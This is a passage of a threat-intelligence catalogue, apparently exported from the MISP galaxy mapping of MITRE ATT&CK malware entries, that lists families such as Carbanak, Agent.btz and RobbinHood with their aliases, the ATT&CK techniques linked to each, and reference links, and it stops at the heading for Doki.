[Agent.btz](https://attack.mitre.org/software/S0092) is a worm that primarily spreads itself via removable devices such as USB drives. It reportedly infected U.S. military networks in 2008. (Citation: Securelist Agent.btz)

The tag is: misp-galaxy:mitre-malware="Agent.btz - S0092"

Agent.btz - S0092 is also known as:

Agent.btz

View relationships graph

Agent.btz - S0092 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive via Custom Method - T1560.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Replication Through Removable Media - T1091" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration over USB - T1052.001" with estimative-language:likelihood-probability="almost-certain"

Table 4645. Table References
Links
https://attack.mitre.org/software/S0092
https://securelist.com/agent-btz-a-source-of-inspiration/58551/

Backdoor.Oldrea - S0093

[Backdoor.Oldrea](https://attack.mitre.org/software/S0093) is a backdoor used by [Dragonfly](https://attack.mitre.org/groups/G0035). It appears to be custom malware authored by the group or specifically for it. (Citation: Symantec Dragonfly)

The tag is: misp-galaxy:mitre-malware="Backdoor.Oldrea - S0093"

Backdoor.Oldrea - S0093 is also known as:

Backdoor.Oldrea
Havex

View relationships graph

Backdoor.Oldrea - S0093 has relationships with:

similar: misp-galaxy:tool="Havex RAT" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive Collected Data - T1560" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Email Account - T1087.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

Table 4646. Table References
Links
https://attack.mitre.org/software/S0093
http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/Dragonfly_Threat_Against_Western_Energy_Suppliers.pdf

Trojan.Karagany - S0094

[Trojan.Karagany](https://attack.mitre.org/software/S0094) is a modular remote access tool used for recon and linked to [Dragonfly](https://attack.mitre.org/groups/G0035) and [Dragonfly 2.0](https://attack.mitre.org/groups/G0074). The source code for [Trojan.Karagany](https://attack.mitre.org/software/S0094) originated from Dream Loader malware which was leaked in 2010 and sold on underground forums. (Citation: Symantec Dragonfly)(Citation: Secureworks Karagany July 2019)(Citation: Dragos DYMALLOY )

The tag is: misp-galaxy:mitre-malware="Trojan.Karagany - S0094"

Trojan.Karagany - S0094 is also known as:

Trojan.Karagany
xFrost
Karagany

View relationships graph

Trojan.Karagany - S0094 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Software Packing - T1027.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Asymmetric Cryptography - T1573.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Checks - T1497.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Thread Execution Hijacking - T1055.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Application Window Discovery - T1010" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

Table 4647. Table References
Links
https://attack.mitre.org/software/S0094
http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/Dragonfly_Threat_Against_Western_Energy_Suppliers.pdf
https://www.secureworks.com/research/updated-karagany-malware-targets-energy-sector
https://www.dragos.com/threat/dymalloy/

OSX_OCEANLOTUS.D - S0352

[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) is a MacOS backdoor with several variants that has been used by [APT32](https://attack.mitre.org/groups/G0050).(Citation: TrendMicro MacOS April 2018)(Citation: Trend Micro MacOS Backdoor November 2020)

The tag is: misp-galaxy:mitre-malware="OSX_OCEANLOTUS.D - S0352"

OSX_OCEANLOTUS.D - S0352 is also known as:

OSX_OCEANLOTUS.D
Backdoor.MacOS.OCEANLOTUS.F

View relationships graph

OSX_OCEANLOTUS.D - S0352 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Launch Daemon - T1543.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive via Custom Method - T1560.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1564.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Software Packing - T1027.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Checks - T1497.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Launch Agent - T1543.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Masquerade Task or Service - T1036.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Gatekeeper Bypass - T1553.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Unix Shell - T1059.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Timestomp - T1070.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Permissions Modification - T1222" with estimative-language:likelihood-probability="almost-certain"

Table 4648. Table References
Links
https://attack.mitre.org/software/S0352
https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-backdoor-linked-to-oceanlotus-found/
https://www.trendmicro.com/en_us/research/20/k/new-macos-backdoor-connected-to-oceanlotus-surfaces.html

OSX/Shlayer - S0402

[OSX/Shlayer](https://attack.mitre.org/software/S0402) is a Trojan designed to install adware on macOS that was first discovered in 2018.(Citation: Carbon Black Shlayer Feb 2019)(Citation: Intego Shlayer Feb 2018)

The tag is: misp-galaxy:mitre-malware="OSX/Shlayer - S0402"

OSX/Shlayer - S0402 is also known as:

OSX/Shlayer
Zshlayer
Crossrider

View relationships graph

OSX/Shlayer - S0402 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Unix Shell - T1059.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Elevated Execution with Prompt - T1548.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1564.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Browser Extensions - T1176" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Linux and Mac File and Directory Permissions Modification - T1222.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Gatekeeper Bypass - T1553.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Hide Artifacts - T1564" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 4649. Table References
Links
https://attack.mitre.org/software/S0402
https://www.carbonblack.com/2019/02/12/tau-threat-intelligence-notification-new-macos-malware-variant-of-shlayer-osx-discovered/
https://www.intego.com/mac-security-blog/osxshlayer-new-mac-malware-comes-out-of-its-shell/
https://www.sentinelone.com/blog/coming-out-of-your-shell-from-shlayer-to-zshlayer/
https://www.intego.com/mac-security-blog/new-osxshlayer-malware-variant-found-using-a-dirty-new-trick/
https://blog.malwarebytes.com/threat-analysis/2018/04/new-crossrider-variant-installs-configuration-profiles-on-macs/

T9000 - S0098

[T9000](https://attack.mitre.org/software/S0098) is a backdoor that is a newer variant of the T5000 malware family, also known as Plat1. Its primary function is to gather information about the victim. It has been used in multiple targeted attacks against U.S.-based organizations. (Citation: FireEye admin@338 March 2014) (Citation: Palo Alto T9000 Feb 2016)

The tag is: misp-galaxy:mitre-malware="T9000 - S0098"

T9000 - S0098 is also known as:

T9000

View relationships graph

T9000 - S0098 has relationships with:

similar: misp-galaxy:tool="T9000" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Audio Capture - T1123" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive via Custom Method - T1560.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Video Capture - T1125" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="AppInit DLLs - T1546.010" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Peripheral Device Discovery - T1120" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Automated Collection - T1119" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

Table 4650. Table References
Links
https://attack.mitre.org/software/S0098
https://www.fireeye.com/blog/threat-research/2014/03/spear-phishing-the-news-cycle-apt-actors-leverage-interest-in-the-disappearance-of-malaysian-flight-mh-370.html
http://researchcenter.paloaltonetworks.com/2016/02/t9000-advanced-modular-backdoor-uses-complex-anti-analysis-techniques/

BS2005 - S0014

[BS2005](https://attack.mitre.org/software/S0014) is malware that was used by [Ke3chang](https://attack.mitre.org/groups/G0004) in spearphishing campaigns since at least 2011. (Citation: Villeneuve et al 2014)

The tag is: misp-galaxy:mitre-malware="BS2005 - S0014"

BS2005 - S0014 is also known as:

BS2005

View relationships graph

BS2005 - S0014 has relationships with:

similar: misp-galaxy:tool="Hoardy" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:malpedia="BS2005" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"

Table 4651. Table References
Links
https://attack.mitre.org/software/S0014
https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-ke3chang.pdf

Sys10 - S0060

[Sys10](https://attack.mitre.org/software/S0060) is a backdoor that was used throughout 2013 by [Naikon](https://attack.mitre.org/groups/G0019). (Citation: Baumgartner Naikon 2015)

The tag is: misp-galaxy:mitre-malware="Sys10 - S0060"

Sys10 - S0060 is also known as:

Sys10

View relationships graph

Sys10 - S0060 has relationships with:

similar: misp-galaxy:malpedia="Sys10" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Local Groups - T1069.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"

Table 4652. Table References
Links
https://attack.mitre.org/software/S0060
https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07205555/TheNaikonAPT-MsnMM1.pdf

Lurid - S0010

[Lurid](https://attack.mitre.org/software/S0010) is a malware family that has been used by several groups, including [PittyTiger](https://attack.mitre.org/groups/G0011), in targeted attacks as far back as 2006. (Citation: Villeneuve 2014) (Citation: Villeneuve 2011)

The tag is: misp-galaxy:mitre-malware="Lurid - S0010"

Lurid - S0010 is also known as:

Lurid
Enfal

View relationships graph

Lurid - S0010 has relationships with:

similar: misp-galaxy:malpedia="Enfal" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive Collected Data - T1560" with estimative-language:likelihood-probability="almost-certain"

Table 4653. Table References
Links
https://attack.mitre.org/software/S0010
https://www.fireeye.com/blog/threat-research/2014/07/spy-of-the-tiger.html
http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp_dissecting-lurid-apt.pdf

Dipsind - S0200

[Dipsind](https://attack.mitre.org/software/S0200) is a malware family of backdoors that appear to be used exclusively by [PLATINUM](https://attack.mitre.org/groups/G0068). (Citation: Microsoft PLATINUM April 2016)

The tag is: misp-galaxy:mitre-malware="Dipsind - S0200"

Dipsind - S0200 is also known as:

Dipsind

View relationships graph

Dipsind - S0200 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Custom Command and Control Protocol - T1094" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Winlogon Helper DLL - T1547.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Transfer - T1029" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

Table 4654. Table References
Links
https://attack.mitre.org/software/S0200
https://download.microsoft.com/download/2/2/5/225BFE3E-E1DE-4F5B-A77B-71200928D209/Platinum%20feature%20article%20-%20Targeted%20attacks%20in%20South%20and%20Southeast%20Asia%20April%202016.pdf

DressCode - S0300

[DressCode](https://attack.mitre.org/software/S0300) is an Android malware family. (Citation: TrendMicro-DressCode)

The tag is: misp-galaxy:mitre-malware="DressCode - S0300"

DressCode - S0300 is also known as:

DressCode

View relationships graph

DressCode - S0300 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Exploit Enterprise Resources - T1428" with estimative-language:likelihood-probability="almost-certain"

Table 4655. Table References
Links
https://attack.mitre.org/software/S0300
http://blog.trendmicro.com/trendlabs-security-intelligence/dresscode-potential-impact-enterprises/

Carbanak - S0030

[Carbanak](https://attack.mitre.org/software/S0030) is a full-featured, remote backdoor used by a group of the same name ([Carbanak](https://attack.mitre.org/groups/G0008)). It is intended for espionage, data exfiltration, and providing remote access to infected machines. (Citation: Kaspersky Carbanak) (Citation: FireEye CARBANAK June 2017)

The tag is: misp-galaxy:mitre-malware="Carbanak - S0030"

Carbanak - S0030 is also known as:

Carbanak
Anunak

View relationships graph

Carbanak - S0030 has relationships with:

similar: misp-galaxy:malpedia="Carbanak" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Email Collection - T1114.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data Transfer Size Limits - T1030" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Portable Executable Injection - T1055.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Account - T1136.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Custom Command and Control Protocol - T1094" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"

Table 4656. Table References
Links
https://attack.mitre.org/software/S0030
https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064518/Carbanak_APT_eng.pdf
https://www.fireeye.com/blog/threat-research/2017/06/behind-the-carbanak-backdoor.html
https://www.fox-it.com/en/news/blog/anunak-aka-carbanak-update/

RIPTIDE - S0003

[RIPTIDE](https://attack.mitre.org/software/S0003) is a proxy-aware backdoor used by [APT12](https://attack.mitre.org/groups/G0005). (Citation: Moran 2014)

The tag is: misp-galaxy:mitre-malware="RIPTIDE - S0003"

RIPTIDE - S0003 is also known as:

RIPTIDE

View relationships graph

RIPTIDE - S0003 has relationships with:

similar: misp-galaxy:tool="Etumbot" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"

Table 4657. Table References
Links
https://attack.mitre.org/software/S0003
https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html

TinyZBot - S0004

[TinyZBot](https://attack.mitre.org/software/S0004) is a bot written in C# that was developed by [Cleaver](https://attack.mitre.org/groups/G0003). (Citation: Cylance Cleaver)

The tag is: misp-galaxy:mitre-malware="TinyZBot - S0004"

TinyZBot - S0004 is also known as:

TinyZBot

View relationships graph

TinyZBot - S0004 has relationships with:

similar: misp-galaxy:tool="TinyZBot" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Shortcut Modification - T1547.009" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Clipboard Data - T1115" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"

Table 4658. Table References
Links
https://attack.mitre.org/software/S0004
https://web.archive.org/web/20200302085133/https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf

RobbinHood - S0400

[RobbinHood](https://attack.mitre.org/software/S0400) is ransomware that was first observed being used in an attack against the Baltimore city government’s computer network.(Citation: CarbonBlack RobbinHood May 2019)(Citation: BaltimoreSun RobbinHood May 2019)

The tag is: misp-galaxy:mitre-malware="RobbinHood - S0400"

RobbinHood - S0400 is also known as:

RobbinHood

View relationships graph

RobbinHood - S0400 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Network Share Connection Removal - T1070.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Inhibit System Recovery - T1490" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1486" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Service Stop - T1489" with estimative-language:likelihood-probability="almost-certain"

Table 4659. Table References
Links
https://attack.mitre.org/software/S0400
https://www.carbonblack.com/2019/05/17/cb-tau-threat-intelligence-notification-robbinhood-ransomware-stops-181-windows-services-before-encryption/
https://www.baltimoresun.com/politics/bs-md-ci-it-outage-20190507-story.html

CosmicDuke - S0050

[CosmicDuke](https://attack.mitre.org/software/S0050) is malware that was used by [APT29](https://attack.mitre.org/groups/G0016) from 2010 to 2015. (Citation: F-Secure The Dukes)

The tag is: misp-galaxy:mitre-malware="CosmicDuke - S0050"

CosmicDuke - S0050 is also known as:

CosmicDuke
TinyBaron
BotgenStudios
NemesisGemina

View relationships graph

CosmicDuke - S0050 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Automated Exfiltration - T1020" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials from Password Stores - T1555" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Removable Media - T1025" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Email Collection - T1114.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Network Shared Drive - T1039" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol - T1048.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Clipboard Data - T1115" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="LSA Secrets - T1003.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Security Account Manager - T1003.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"

Table 4660. Table References
Links
https://attack.mitre.org/software/S0050
https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf

Doki - S0600

